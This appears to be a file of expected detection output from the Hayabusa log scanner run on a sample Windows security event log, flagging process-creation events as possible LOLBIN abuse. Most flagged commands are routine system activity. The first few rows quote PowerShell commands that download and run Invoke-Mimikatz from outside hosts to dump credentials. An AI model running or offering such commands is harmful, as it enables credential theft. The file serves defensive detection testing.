+2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb20 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x500 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 01:46:13.438 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb74 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 01:46:13.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x648 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 06:44:54.269 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xcf0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 06:44:55.299 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 06:44:55.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 06:45:05.616 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 11:00:00.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 13:15:14.072 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 13:15:14.084 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:37:30.766 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART | Path: C:\Windows\System32\rundll32.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:37:30.851 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x778 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:37:30.855 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xb18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:37:31.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:37:31.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:37:31.960 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:54:31.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xebc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:54:31.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-29 23:54:31.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:12:55.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:19:56.352 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pokby4eb.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:19:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zfglcxyz.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdd4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:19:56.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\agq-0l0x.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdec | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:19:56.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\h5llmxxc.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xb80 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:19:57.533 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xb18 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:19:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x1a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:26:10.013 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 00:26:10.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 03:52:07.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x704 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 03:52:09.246 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 03:55:06.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 03:55:10.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 03:55:10.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x458 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 04:01:46.591 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 05:07:27.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x41c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 05:07:27.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x748 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 06:32:15.294 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1110 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 06:32:37.708 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 06:33:45.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x770 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 06:33:47.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 06:36:08.808 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1454 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 06:36:32.722 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbdc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 10:44:32.448 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x17ac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 10:44:32.463 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x584 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 18:48:21.079 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 18:48:21.686 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x10d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 18:48:21.710 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x15c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 18:48:40.739 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x87c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 18:53:51.556 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 20:00:00.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x12b0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 21:12:52.789 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 21:12:52.817 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x15b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 21:12:52.880 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x730 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 21:14:52.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x1790 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
